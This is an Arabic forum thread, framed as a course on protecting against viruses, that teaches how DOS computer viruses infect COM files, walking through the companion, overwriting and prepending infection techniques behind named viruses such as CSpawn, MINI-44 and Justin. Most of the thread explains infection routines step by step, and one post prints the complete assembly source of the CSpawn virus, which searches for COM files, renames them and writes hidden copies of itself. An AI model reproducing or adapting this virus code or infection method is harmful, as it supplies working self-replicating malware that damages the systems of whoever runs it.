مؤسس المنتدى
Admin
السٌّمعَة : 1
 |  موضوع: دورة الفيروسات للحماية منها  الأحد فبراير 06, 2011 7:28 am | |
| [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
دورة كن مبرمج مضاد للفيروساتقول وداعا لشراء او تنزيل برنامج حماية وتتركة يمسكلك [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
1- 1- اساسيات فيروسات الكمبيوتر : -
1-1- 1 - ما هو فيرس الكمبيوتر ؟
[size=25][size=25][size=25][size=25][size=25][size=25][size=25][size=25][size=25][size=25][size=25][size=16][size=16][size=21][size=16][size=25][size=16][size=16][size=21][size=16][size=16][size=16][size=16][size=21][size=16][size=16][size=16][size=16][size=16][size=16][size=16][size=16][size=16][size=16][size=16][size=16][size=16][size=16][size=16][size=16][size=16][size=16][size=25][size=25][size=25][size=25][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size] - ببساطه هو برنامج يقوم بنسخ نفسه بعد ما يتم تشغيله الى الابد حتى يتم اكتشافه ببرامج مضاد [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط].
1-1 -2 - ما هو المصطلح الحقيقى للفيرس ؟
- المصطلح الحقيقى هو برامج الاستنساخ الذاتى او الالى ولكن كلمة فيرس مرتبطة عند الناس بشعور سىء عند سماع كلمة فيرس .
- اول من تكلم عن هذا الامر هو فريد كوهين سنه 1985 فى مشروع التخرج لانه ناقش برمجيات الاستنساخ الذاتى .
1-1-3 - كيف يستطيع البقاء فى الجهاز اطول مدة ؟
- لانه يعلق او يربط نفسه ببرامج التى يقوم المستخدم عادة بتشغيلها عند فتح الجهاز مثل الاكسبلولر ( الانترنت ) وعندما يشغل المستخدم برنامج الاكسبلولر يشتغل معه الفيرس ومن هنا يستمر فى نسخ نفسه وعندما يقوم برنامج الحماية بمسكة ممكن يكلف انزال ويندوز جديد بسبب البرامج الماسك به مثل الاكسبلولر.
1-2 - العناصر الفنيه فى [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]:-
1-2-1 - متى نطلق اسم فيرس على شىء فى الكمبيوتر ؟
- عندما يكون بيعمل 2 من 3 الاجزاء الاساسيه او الروتينات الفرعية وهما :-
1- روتين التفتيش وهو معناه قيامة بالكشف على الملفات او الاقراص الجديدة فى الجهاز التى هى جديرة بالاهتمام لاصابتها والاهم هو حساب الوقت او السرعة التى يحتاجها لكشف واصابه الاهداف الجديدة واصابته لكل شىء او بعضها وهناك قانون اسمه الحجم مقابل الوظيفه يعنى كلما زاد وظائف الفيرس زاد حجمة.
2- روتين البحث و النسخ نفسه الى البرامج والملفات التى يحددها روتين التفتيش هنا القاعدة هى كلما ضغر حجم الفيرس كان افضل وايضا اجراءات مضادة لبرامج الحماية حتى لا يكتشفوا مثل عدم التعديل على تاريخ الملفات او البرامج محاولا خداع برنامج الحماية انه ليس موجود هناك .
3- روتين او اجراء ليس له اى علاقة بما سبق والهدف [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]تدمير البيانات او انشار رساله سياسيه غاضبه و حتى بعض الاجراءات المفيدة للكمبيوتر.
1-3- تصنيف ( انواع ) [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]:-
1- يصنف فيرس الكمبيوتر عادة الى نوع الملفات ( البرامج ) التى يصيبها و طرق العدوى المستخدمة .
2- التمييز بين اصابة منطقة اقلاع الكمبيوتر ( بووت سيكتور ) او اصابه الملفات ( البرامج ) العادية فى الجهاز.
3- يصنف ايضا اذا كان يصيب فقط ملفات ( برامج ) (EXE or COM or SYS ) او كلهم معا .
4- اخيرا يجب ان نعرف ان الفيرس يمكن ان يكتب لاصابى اى شىء او( رمز ) فى الجهاز ومن هنا نعرف انه يمكن اصابة مثلا البرامج الاساسية او الملفات الدفاعية مثل برانامج الحماية وتدميرها او يجعها منظر فى الجهاز او حتى قواعد البيانات او اى شىء فى الجهاز .
| |
|
مؤسس المنتدى
Admin
السٌّمعَة : 1
| | موضوع: رد: دورة الفيروسات للحماية منها الأحد فبراير 06, 2011 7:29 am | |
| 3-1- بعض اساسيات الدوس :- 3-2- لفهم الوسائل التى يمكن للفيرس من نسخ نفسه من برنامج الى اخر * 1- فهو يحتاج الى الدخول الى تفصيل نظام التشغيل وتحميل البرنامج فى الذاكرة .
3- ثم يكون مصمم ليعدم الكود ( الرمز ) بعد ان ربط او تعلق بالبرنامج فى الذاكرة.
4- عندئذ فقط يمكنه ان يتكاثر بعد استطاعته فى تمرير التحكم الى نظام التشغيل مرة اخرى.
5- عندما يقوم المستخدم بتشغيل الفيرس على الجهاز ، يقوم الجهاز بتحميل الملف الى الذاكره وتنفيذه .
6- سواء كان الفيرس امتدادة (BAT or COM or EXE) او غيرها من المتدادات التنفذيه .
7- امتدادات (COM & EXE) يتم تنفيذها مباشر من CPU ( البروسيسور) .
8- امتداد (COM) ياخذ صورة منه الى الذاكرة ويتنظر الوقت المناسب على حسب المكتوب فى الملف وينفذه CPU
ولكن ليس مثل ( EXE ) لانه ينفذ بمجرد تشغيله.
9- لتنفيذ ملف بامتداد (COM ) يجب على نظام التشغيل عمل بعض التحضيرات قبل اعطاء التحكم الى البرنامج .
10- الاهم هو وجود مساحه او توفير مساحه كافيه لتنفيذ الملف .
11- فى بعض الاحيان يوجد فيرس فى ملف ويشغله المستخدم ويعرف ما سوف يقوم به ويشغل ملف اخر حامى من الفيرس فاذا كان الفيرس مازال فى الذاكره ولم يشتغل بعد يتظر مثلا اعادة تشغيل الجهاز فانه يقوم بمسح الفيرس او الحمايه منه .
12- من هنا نعرف ان الذاكره يمكن ان تحمل باكثر من شىء فى وقت معين حتى وان كان عكس بعض .
13- بعد ذالك يرجع التحكم الى نظام التشغيل مره اخرى . ** دعونا نلقى نظره عمليه سهله على فيرس من نوع (com ) بلغه التجميع يعادل Hello.c [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]3-2- ما هى ملفات ال (COM.) ؟ * لا تستعجب من الاجابه فهو من مخلفات ايام (PC/M) وقت ما كان نظام التشغيل هو الدوس .
* وكانت تستخدم وقتها معلجات ( CPU) يمكنها ان تعالج فقط 64 كيلوبايت ونوعها ( Z80 or 8080 ) .
* وبعد التطوير من ميكروسوفت كانت تهدف لترقيه هذة فى (8088) فكانت النتيجة النهائيه ملفات ( COM.). 3-4- ما هو (CP/M) ؟ * كانت شعبيته فى اواخر السبعينات واوائل الثمانينات باعتبارها نظام التشغيل للكمبيوترات استنادا الى8080 ومعلجات Z80 .
* كتب لنظام تشغيل الدوس الالف البرامج نظرا لشعبيه فى الماضى وايضا ملفات ( COM. ) .
* كتبت برامج وتشتغل فى الدوس لهذا فالدوس باقى حتى الان مع ان لا يتم استخدامه الا قليل لمبرمجين الدوس .
* ومع هذا هو يستفيد منه البعض رغم ذالك كما سترى بعد قليل . [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]3-2-1- مخطط الفيرس :- 3-2-2- كيف يستطيع الفيرس الاقامه فى ملف COM. ؟ * من اجل اقامه الفيرس فى الملف لابد من الحصول على السيطره من البرنامج فى اى وقت اثناء تنفيذه ويسمى بقانون الصداره .
* يمكن تصور ان الفيرسيقوم بفحص ملف COM وتحديد الكيفيه التى يمكن انتزاع بها السيطره من البرنامج فى اى وقت اثناء تنفيذه .
* اذا كان بيانات الفيرس نسخت فى اخر البرنامج فهناك وقت لفحص البرنامج قبل تنفيذ الفيرس.
* لهذا يسعى الفيرس ليكون فى بدايه تنفيذ البرنامج ومن هنا يحمل الى البايت القليله الاوله فى ملف COM .
* ثم القفز الى رمز الفيرس والتى يمكن الحاقها فى نهايه الملف COM .
* وعندما يشتغل الملف هنا جاء الوقت لينتقل ويبحث عن ملفات جديده لاصابتها وهكذا.
* المشكله فى النهايه ان على الفيرس ان يستعيد البيانات التى نسخها فى اول الملف .
* ثم الانتقال للعودة الى تعويض 100 Hex حيث يبدء البرنامج الاصلى . | |
|
مؤسس المنتدى
Admin
السٌّمعَة : 1
| | موضوع: رد: دورة الفيروسات للحماية منها الأحد فبراير 06, 2011 7:29 am | |
| - ببساطه هى فهم كيفيه عمليات تفتيش الفيرس اصابه ملفات جديدة فى الجهاز .
- لهذا يجب ان تفهم كيف تتم عمليه التخزين للملفات والمعلومات على الجهاز .
- يتم تخزين الملفات والمعلومات فى مجالين على القرص ومعروفه باسم الدليل وجدل تخصيص الملفات .
- الدليل يحتوى على 32 بايت بسجل واصف لكل ملف انظر الشكل القادم .
- الشكل يصف اسم الملف ومداها وحجمها وتاريخ ووقت انشائها وسمه الملف .
- كما يحتوى على معلومات اساسيه لنظام التشغيل يساعده على كيفيه التعامل مع هذا الملف .
- FAT هو عباره عن خريطه كامله للهارد والتى ببساطه تعلم نظام التشغيل عن المناطق التى بها الملفات .
- كل هارد شغال بنظام تشغيل له نسختين من الملفات وهى نسخ متطابقه مع بعضها البعض .
- النسخه الثانيه هى نسخه احتياطيه وتستخدم فى حاله تلف او عطوب للملفات فى النسخه الاوله .
- هناك دليل واحد يسمى بالدليل الجذرى وممكن يتفرع منه دلائل كثيره ويكون دليل نظام التشغيل مثل فولدر windows .
- وهذا الدليل على كل هارد نازل عليه نظام تشغيل .
- قد يكون الدليل متداخل مع غيره على شكل واحد داخل الاخر مثل الشجره .
- يستطيع المستخدم انشاء مثل هذه الدلائل ويتحكم بها ولكن فى الدليل الاساسى لنظام التشغيل قد لا يستطع ان يتحكم بها كلها . صوره توضح ما سبق - كل من FAT والدليل الجذرى يقع فى منطقه محدده فى الهارد وخاصه بالنسبه لهم .
- الدلائل يتم تخينها مثل غيرها من الملفات على الهارد مع اضافه سمه للملف تدل على انه الدليل الجذرى .
- الملف الفرعى يتكون من سلسله من السجلات ال 32 بايت تصف ملفات هذا الدليل .
- قد يحتوى سجل ال 32 بايت من الملفات الفرعيه واخد صفه الدليل .
- فى هذه الاثناء يشار اليها بانها دليل فرعى من فرعى .
- نظام التشغيل عادة ما يسيطر على الوصول الى جميع الملفات والدلائل (الفولدرات ) .
- يستطيع نظام التشغيل ان يعرض وصف لكل الملفات على الهارد .
- بهذا يستطيع المستخدم ان يتعامل مع التفصيل المعقده لاداره الملفات والتواصل مع الاجهزة بسهوله . 4-1-1- من نظام التشغيل تستطيع ان تفعل هذا مع الملفات اللى عندك ادخل الى اى برتشن 1- اختيار من القائمه بالاعلى كلمه View .
2- اختيار كلمه Details من قائمه View . 4-1-2-وضوح اكثر لكيف عمل وظيفه البحث ؟ 1- نريد البحث فى الدليل على جميع الملفات التى تسجل (COM.) .
2- بما فى ذلك الملفات المخفيه وملفات النظام * الوسيله لغه الاسمبلى ( التجميع ) تستطيع ان تساعدك على فعل هذا. - مع اعتبار ان تم عمل هذا بشكل صحيح . - اذا كان هذا الروتين نفذته بنجاح هيكون مثل هذا الشكل : - عندما يتم العثور على الملفات التى تحميل هذا المسى ( COM.) .
- قم بالبحث عن ملف باسم COMMAND.COM .
* بالمقارنه مع اول وظيفه البحث والبحث التالى هو امر سهل جدا لاننا نضيف فقط 4F ودعوه المقاطعه او المكان 21H : صوره توضح ما سبق - فى حاله العثور على ملف جديد سوف يتم التحديث باضافه اسم الملف الجديد.
- اذا لم يتم العثور على ملفات جديدة سيتم العودة الى نقطة الصفر .
- يجب ان يكون حذر عندما يتم الدعوه الى البحث فى وقت لاحق وايضا اعاده هذا بصفه مستره .
- بسبب امكانيه اجاد ملفات جديده واصابتها .
- فيرس The MINI-44 Virus Listing يقوم بوضع البحث اولا عن الوظائف معا .
- لايجاد كل برامج COM فى الدليل وذلك باستخدام منطق بسيط فى الشكل القادم .
- النتيجة هى اصابه هذا الفيرس لكل ملفات com فى الدليل بعد تشغيل الفيرس . صوره توضح ما سبق ( منطق البحث عن الملفات ) | |
|
مؤسس المنتدى
Admin
السٌّمعَة : 1
| | موضوع: رد: دورة الفيروسات للحماية منها الأحد فبراير 06, 2011 7:31 am | |
|
* فيرس MINI-44 فى آليه التكرار هو ابسط من آليه تكرار البحث.
* لانه يفتح البرنامج ثم يكتب ويعدل على البرنامج ثم يقفل البرنامج مع حفظ التغيير.
* لعمل هذا يجب ان ياخذ اذن من نظام التشغيل .
صوره توضح لملفات com قبل وبعد الاصابه .
5-1-1- مصاحب ( رفيق ) الفيرس :-
* مصاحب الفيرس هو الخطوه التليه فى التعقيد بعد فيروسات من نوع كتابه الفيروسات .
* مصاحب الفيرس يستبدل اسم الملف المصاب الشكل القادم يبن الملفات الموجوده قبل الاصابه.
صوره توضح الملفات قبل اصابتها واستبدال اسمها
* بعد اصابه الملف يقوم بتعديل واستبدال اسم الملف من HOST1.COM الى HOST1.CON .
* يتم اضافه الملف المصاب الى جنب الملفات الموجوده فى الجهاز .
* يعيش الفيرس فى ملف HOST1.COM مخفى .
* بعد تشغيل ملف HOST1.COM من المستخدم فانه الفيرس يشتغل الاول .
* ثم يمرر السيطره الى HOST1.CON عندما يكون مستعد.
* هذا الفيرس الغير مقيم يسمى CSpawn .
5-1-2- ما هى الامور المهمه التى يجب تحقيقها لفيرس مصاحب ؟
1- يجب ان يكون قادر على نشر العدوى او غيرها من الملفات بعضها وبعض .
2- يجب ان يكون قادر على نقل السيطره الى الملفات او البرامج مره اخرى لتقوم بعملها .
صوره توضح الملفات بعد اصابتها
5-1-3- المنفذ او الدخول للملفات :-
* CSpawn قبل ان يصيب البرامج الاخرى يقوم بتنفيذ البرنامج الذى لم يربط نفسه به بعد .
* هذا الملف او البرنامج موجود كملف منفصل على الهارد .
* ونسخه فيرس CSpawn التى تبحث عن الملف او البرنامج لديه نسخع من اسمها ( جديد ) المخزن بها.
* قبل تنفيذ الملف او البرنامج يقوم CSpawn بتقليل مقدار الذاكره ليأخذه لنفسه .
* فى ملفات COM يكون فى الجزى العلوى للملف ، حتى يشتغل اولا قبل الملف ( فى الخلفيه ) بدون ما تشعر .
* وهذا ياخذ 64 كيلو بايت من الذاكره او الرامه حتى لو كان فقط بعض مئات البايت الطويله .
* وهذا بالنسبه لاى قصد او غرض من هذا الفيرس .
* ويستطيع ان يضيف نفسه الى اى جزء فى الملف وقبل النهايه ويتم هذا بتغير طريق sp .
صوره توضح تغير طريق sp
* التالى يجب على CSpawn يتصل بنظام التشغيل هنا (DOS) لزوم تحرير الذاكره .
* ولعمل هذا يجب مقاطعه 21H و الداله 4AH ووضع فقرات 16 بايت من الذاكره .
صوره توضح ما سبق
* بعد تحرير الذاكره للفيرس يقوم بارجاع السيطره الى الملف او البرنامج .
* يقوم بهذا باستخدام مقاطعه 21H والداله BH فى نظام التشغيل (DOS) .
* ليقوم الفيرس باستبدال اسم الملف يكون مخرن به ( متغير SPAWN_NAME) واستخدام الداله ds:dx.
* يجب اعادة سجل القاعدة الى الصفر ليقوم نظام التشغيل بتحميل الملف وتنفيذه او تحميل بلا تنفيذ مثل انتظار قفل الجهاز وفتحه .
صوره توصح ما سبق بالتفصيل
* ال (DOS) يحمل الملف دون اى ضجه اخرى .
* ثم عودة السيطره الى الفيرس .
* واثناء عمليه التنفيذ يجب على الفيرس ان ينظف بعض الامور قبل ان يفعل اى شىء اخر .
صوره توضح ما سبق
| [وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط]
vbrep_register("41359")
[وحدهم المديرون لديهم صلاحيات معاينة هذا الرابط] | |
* مصاحب او رفيق الفيرس لايبحث عن الملفات لاصابتها مثل فيرس MINI-44 .
* مصاحب الفيرس صمم لاصابه كل ملفات com فى الهارد وليس فقط الفولدر الحالى .
* عمليه بحث مصاحب الفيرس هى نفس منطق الذى يستخدمها فيرس MINI-44 .
* لهذا يستخدم مصاحب الفيرس مقاطعه 21H ، 4EH ، CSpawn and 4FH . صوره توضح روتين البحث الخاص بالفيرس * لدينا دعوه لإجراء منفصل العدوى الان ومنذ بدء عمليه العدوى وهو اكثر تعقيدا.
* يجب ان ياخد كمان خطوه بشكل صحيح الفيرس باستخدام وظائف البحث 43 بايت .
* لنقل مساحة المطلوبه من الهارد . 6-1-1- اين مكان هذه الخطوه الاخيره ؟ * ياستخدام CSpawn داله 1AH وتحديد ds:dx الى المكان المراد الحفظ فيه .
* المكان الافتراضى هو ds:0080H . * اذا CSpawn لم يفعل بحثه واصابه المضيف وبالتالى لم يعدم الكود بتاعه .
* فلا يستطيع استخدام مكان 80H لان معلومات سطر الاوامر يتم تخزينها هنا ايضا.
* وعلميه البحث سوف تخرج المعلومات خارج هذا المكان .
6-1-2- عدوى الملف :- * CSpawn عندما يجد ملف واحد ويصيب هذه عمليه عدوى بسيطة الى حد ما . * ماذا يحدث عندما CSpawn تصيب الملف او البرنامج ؟ 1- تعديل اسم الملف المصاب بعد اضافه الجديد المتفيرس جنب الاصلى . 2- تصميم نسخة من نفسه للملف الاصلى مع اسمه. * عندما يقوم المستخدم بتشغيل الملف الاصلى بعد الاصابه سوف يشتغل الملف المصاب بدلا منه. * لتعديل الاسم الاصلى للملف يستخدم روتين تفتيش وضعه فى منظقه معزوله SPAWN_NAME . * يقوم دائما بتغير اخر حرف فى الاسم الى N . * يستدعى الداله 21H و الداله 56H لاعاده التسميه * والداله ds:dx للاشاره الى اسمه الاصلى. * والداله es:di بدلا من الاشاره الى الاسم الجديد فى SPAWN_NAME . صوره توضح ما سبق [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]* اخير الفيرس يقوم بتصميم ملف يحمل الاسم الاصلى مع للاستضافه .
صوره توضح ما سبق * ويكتب لنفسه نسخه من هذا الملف . 6-1-3- هناك سببين لتصميم الملفات المصابه مخفيه ؟ 1- يجعل من الصعب مسح كود الفيرس من الملف بسبب :-
* لا تستطيع مسح الملفات .
* تحتاج لبرنامج حمايه حتى يقوم بكشفه ومسحه .
2- بعد اصابه الملف يقوم الفيرس بمحاوله لعدم ايجاد الملف الاصلى او
* محاولا اصابه الملف باستخدام اليه القفز مع ان هذا غير مكتوب فى تصميم الفيرس.
* لهذا يقوم الملف بالاختباء بالاختفاء وهذا يمنع الاصابه مره اخرى.
6-2- كود فيرس SPAWNR *** كود PHP: [FONT=diwani] [/FONT]
[FONT=diwani]The CSpawn virus is a simple companion virus to illustrate how a companion[/FONT]
[FONT=diwani]virus works.[/FONT]
[FONT=diwani];[/FONT]
[FONT=diwani];(C) 1994 American Eagle Publications, Inc. All Rights Reserved![/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani].model tiny[/FONT]
[FONT=diwani].code[/FONT]
[FONT=diwani] org 0100h[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani]CSpawn:[/FONT]
[FONT=diwani] mov sp, OFFSET FINISH + 100H ;Change top of stack[/FONT]
[FONT=diwani] mov ah, 4AH ;DOS resize memory fctn[/FONT]
[FONT=diwani] mov bx, sp[/FONT]
[FONT=diwani] mov cl, 4[/FONT]
[FONT=diwani] shr bx, cl[/FONT]
[FONT=diwani] inc bx ;BX=# of para to keep
[FONT=diwani] int 21H[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani] mov bx, 2CH ;set up EXEC param block[/FONT]
[FONT=diwani] mov ax, [bx][/FONT]
[FONT=diwani] mov WORD PTR [PARAM_BLK], ax ;environment segment[/FONT]
[FONT=diwani] mov ax, cs[/FONT]
[FONT=diwani] mov WORD PTR [PARAM_BLK+4], ax ;@ of parameter string[/FONT]
[FONT=diwani] mov WORD PTR [PARAM_BLK+8], ax ;@ of FCB1[/FONT]
[FONT=diwani] mov WORD PTR [PARAM_BLK+12], ax ;@ of FCB2[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani] mov dx, OFFSET REAL_NAME ;prep to EXEC[/FONT]
[FONT=diwani] mov bx,OFFSET PARAM_BLK[/FONT]
[FONT=diwani] mov ax,4B00H[/FONT]
[FONT=diwani] int 21H ;execute host[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani] cli[/FONT]
[FONT=diwani] mov bx,ax ;save return code here[/FONT]
[FONT=diwani] mov ax,cs ;AX holds code segment[/FONT]
[FONT=diwani] mov ss,ax ;restore stack first[/FONT]
[FONT=diwani] mov sp,(FINISH - CSpawn) + 200H[/FONT]
[FONT=diwani] sti[/FONT]
[FONT=diwani] push bx[/FONT]
[FONT=diwani] mov ds,ax ;Restore data segment[/FONT]
[FONT=diwani] mov es,ax ;Restore extra segment[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani] mov ah,1AH ;DOS set DTA function[/FONT]
[FONT=diwani] mov dx,80H ;put DTA at offset 80H[/FONT]
[FONT=diwani] int 21H[/FONT]
[FONT=diwani] call FIND_FILES ;Find and infect files[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani] pop ax ;AL holds return value[/FONT]
[FONT=diwani] mov ah,4CH ;DOS terminate function[/FONT]
[FONT=diwani] int 21H ;bye-bye[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani];The following routine searches for COM files and infects them[/FONT]
[FONT=diwani]FIND_FILES:[/FONT]
[FONT=diwani] mov dx,OFFSET COM_MASK ;search for COM files[/FONT]
[FONT=diwani] mov ah,4EH ;DOS find first file function[/FONT]
[FONT=diwani] xor cx,cx ;CX holds all file attributes[/FONT]
[FONT=diwani]FIND_LOOP: int 21H[/FONT]
[FONT=diwani] jc FIND_DONE ;Exit if no files found[/FONT]
[FONT=diwani] call INFECT_FILE ;Infect the file![/FONT]
[FONT=diwani] mov ah,4FH ;DOS find next file function[/FONT]
[FONT=diwani] jmp FIND_LOOP ;Try finding another file[/FONT]
[FONT=diwani]FIND_DONE: ret ;Return to caller[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani]COM_MASK db '*.COM',0 ;COM file search mask[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani];This routine infects the file specified in the DTA.[/FONT]
[FONT=diwani]INFECT_FILE:[/FONT]
[FONT=diwani] mov si,9EH ;DTA + 1EH[/FONT]
[FONT=diwani] mov di,OFFSET REAL_NAME ;DI points to new name[/FONT]
[FONT=diwani]INF_LOOP: lodsb ;Load a character[/FONT]
[FONT=diwani] stosb ;and save it in buffer[/FONT]
[FONT=diwani] or al,al ;Is it a NULL?[/FONT]
[FONT=diwani] jnz INF_LOOP ;If so then leave the loop[/FONT]
[FONT=diwani] mov WORD PTR [di-2],'N' ;change name to CON & add 0[/FONT]
[FONT=diwani] mov dx,9EH ;DTA + 1EH[/FONT]
[FONT=diwani] mov di,OFFSET REAL_NAME[/FONT]
[FONT=diwani] mov ah,56H ;rename original file[/FONT]
[FONT=diwani] int 21H[/FONT]
[FONT=diwani] jc INF_EXIT ;if cant rename, already done[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani] mov ah,3CH ;DOS create file function[/FONT]
[FONT=diwani] mov cx,2 ;set hidden attribute[/FONT]
[FONT=diwani] int 21H[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani] mov bx,ax ;BX holds file handle[/FONT]
[FONT=diwani] mov ah,40H ;DOS write to file function[/FONT]
[FONT=diwani] mov cx,FINISH - CSpawn ;CX holds virus length[/FONT]
[FONT=diwani] mov dx,OFFSET CSpawn ;DX points to CSpawn of virus[/FONT]
[FONT=diwani] int 21H[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani] mov ah,3EH ;DOS close file function[/FONT]
[FONT=diwani] int 21H[/FONT]
[FONT=diwani]INF_EXIT: ret[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani]REAL_NAME db 13 dup (?) ;Name of host to execute[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani];DOS EXEC function parameter block[/FONT]
[FONT=diwani]PARAM_BLK DW ? ;environment segment[/FONT]
[FONT=diwani] DD 80H ;@ of command line[/FONT]
[FONT=diwani] DD 5CH ;@ of first FCB[/FONT]
[FONT=diwani] DD 6CH ;@ of second FCB[/FONT]
[FONT=diwani]FINISH:[/FONT]
[FONT=diwani] [/FONT]
[FONT=diwani] end CSpawn[/FONT]
[FONT=diwani][/LEFT][/FONT]
| |
|
مؤسس المنتدى
Admin
السٌّمعَة : 1
| | موضوع: رد: دورة الفيروسات للحماية منها الأحد فبراير 06, 2011 7:31 am | |
|
7-1- الفيروسات الطفيليه تصيب com :-
* الفيروسات الطفيليه تلتصق بملفات com بطريقه غير مدمرة .
* الفيروسات الطفيليه تمتاز انه لا تدمر البرامج التى تهاجمها .
* الفيروسات الطفيليه لا يترك ريب من الملفات المخفيه الجديده المصابه وحتى لو غير الاسم.
* الفيروسات الطفيليه بدلا من ذلك تدرج نفسها فى ملف البرنامج الحالى لاختبار الملف.
* الفيروسات الطفيليه تلاحظها بعد اصابه الملف من كبر حجم الملف قليل وايضا لها تاريح جديد .
7-1-1- هناك طريقتين فقط لكتابها لاصابه ملفات com ***
1- وضع الفيرس فى بدايه الملف عند اصابته .
2- وضع الفيرس فى نهايه الملف عند اصابته .
* كل استراتيجيه لها مميزاتها وصعوباتها لهذا سناقش الان رقم 1
* ضروره التدقيق اثناء كتابه الفيرس حتى لا ينشاء مشاكل بسبب اخطاء برمجيه*
** فيروسات الطفيليه التى تضع نفسها فى بدايه الملف عند الاصابه **
7-2- فيروسات The Justin :-
* فيروسات The Justin هذا هو فيرس الطفيليه التى تضع نفسها فى بدايه الملف مثل CSpawn .
* فيروسات The Justin تصيب فقط ملفات COM الموجوده فى الفولدر الحالى فقط لهذا سنتعلمها .
* فيروسات The Justin لابد لها من اختبار الملف للتاكد من بعض الامور قبل الاصيبه .
صور توضح الفيرس عندما يصيب الملفات قبل وبعد
7-2-1- فحص الذاكره او Ram :-
* هذا الخطوه الاوله والاكثر اهميه ، لانه يجب على الفيرس يجد مساحه كافيه للتنفيذ عمله .
* بعدها سوف تقرء الملف باكمله الى الذاكره ثم تعدل عليه وحفظه فى نفس الملف .
* وهذا يسمى روتين CHECK_MEM وهو موجود فى الفيرس .
* يحتاج الى 64 كليو من الذاكره وطبعا هذه الفيروسات كانت مكتوبه لنظام التشغيل دوس .
* بعد كتابه الفيرس سوف يشبه هذا .
* توضح الصوره ما سوف يفعها الفيرس اذا وجد مساحه او لا .
* عندما يجد مساحه سوف يصيب الملف ويرجع السيطره الى الملف.
* عندم لا يجد مساحه لا يفعل شىء ويرجع السيطره الى الملف .
* فى الحالتين السابقتين فانه يرجع السيطره حتى يقوم الملف بعمله ولا يكشف الفيرس .
* فى العاده يعطى كل المساحه الموجود فى الذاكره الى الملف .
* لهذا سوف يتحكم الفيرس فى كل المساحه الموجودة .
* الفيرس يعيش فى 100H ويشتغل مع psp .
* يريد الفيرس فقط 64 كيلوبايت حتى يستطيع العمل .
* يمكن تعديل الذاكره المخصصه باستخدام المقاطعه 21H و الداله 4AH .
صوره توضح ما سبق
7-2-2- روتين CHECK_MAN يشبه هذا :
7-2-3- الخوص فى الجزء الرفيع ( Going into the High Segment )***
* اول شىء بهد وجود الذاكره الكافيه هى نقطه القفز الى كتله عاليه من 64 كيلوبايت ليبدء التنفيذ.
* اسمها JUMP_HIGH وواول شىء تفعله هى وضع نسخه من الفيرس فى هذا الجزء الجديد .
* ولهذا يستخدم تعليمات مندوب movsb ، وهى تتحرك من cx بايت وهى من ds:si الى es:di فى الذاكره .
* يبدء الفيرس فى ds:100H ويوقف البرنامج وطوله 100H .
* البرنامج هو عنوان الملف حيث يبدء .
* وبعد انتهاء الفيرس وبالتالى نقل الفيرس ويتم ذلك عن طريق .
* التالى ، الفيرس يتحرك ويتنتقل فى الهارد الى مكان جديد فى هذا الجزء 80H تعويض باستخدام الداله 1AH .
* يحافظ على ما هو مكتوب واخيرا JUMP_HIGH يمرر السيطره على نسخه الفيرس فى الجزء الرفيع High Segment .
* JUMP_HIGH يسمى من قبل روتين التحكم الرئيسيه ووضع تعليمات دعوه للمعالجه فى stack والقيمه 108H .
صوره توضح ما سبق
| |
|
مؤسس المنتدى
Admin
السٌّمعَة : 1
| | موضوع: رد: دورة الفيروسات للحماية منها الأحد فبراير 06, 2011 7:32 am | |
|
7-4- اصابه الملف :-
*الان ، لو لم يجد ملف ليصيبه FIND_FILE. * فانه يقوم باعده تعيين مؤشر الملف الى بدايه الملف مره اخرى . * ويستخدم الداله 40H للكتابه فى الملف المراد اصابته . * وايضا حجم الملف يتم تمريرها الى INFECT_FILE من FILE_OK فى dx . * و bx يحتوى على حجم الملف ومقبض الملف . * INFECT_FILE يضيف حجم الفيرس OFFSETHOST - 100H . * ويكتب من 100H يقابها فى الجزء الرفيع . [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]إغلاق الملف وعدوى كاملة.
7-4-1- التنفيذ للملف :-
* اخر شىء يقوم جوستين ( الفيرس ) بتنفيز الملف او البرنامج الاصلى بعد اصابته.
* ويتم تخزين الاصابه فى الملف الجديد فى الجزء الرفيع.
* ويتم اضافه الملف الاصلى فى الجزء الاسفل للملف حتى يبدء الفيرس من اول الملف عند فتحه.
* يجب ان يكون قد رجع من ملف (البرنامج) الاوفست لـ 100H .
* حتى يستطيع تحميلها لو كان قد تم تحميلها من قبل فى حاله الاصابه.
* واذا كان الملف حجمه كبير يمكن تتحرك لاسفل الكومه ليستولى على الملف باى حجم.
* يجب ان يكون حريصا على عدم نقل اى شىء الى الكومه نفسها .
* ويمكن ان يعطل PSP ويسبب تعطيل النظام ( الدوس ).
* اخيرا ، جوستين نقل السيطره على الملف باستخدام العدوه الان .
* هنا ، الملف يحصل على السيطره وينفذ كما لو كان شىء لم يحدث.
| |
